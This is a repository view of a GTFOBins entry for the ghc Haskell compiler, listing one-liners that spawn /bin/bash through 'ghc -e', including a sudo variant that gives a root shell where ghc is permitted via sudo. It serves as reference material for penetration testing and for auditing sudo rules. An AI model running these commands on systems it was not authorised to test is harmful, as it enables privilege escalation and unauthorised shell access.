Files
GTFOBins.github.io/_gtfobins/ghc.md
Ryan Saridar 106dede9da Add ghc binary
2020-10-24 12:46:42 +02:00

8 lines
161 B
Markdown

---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
---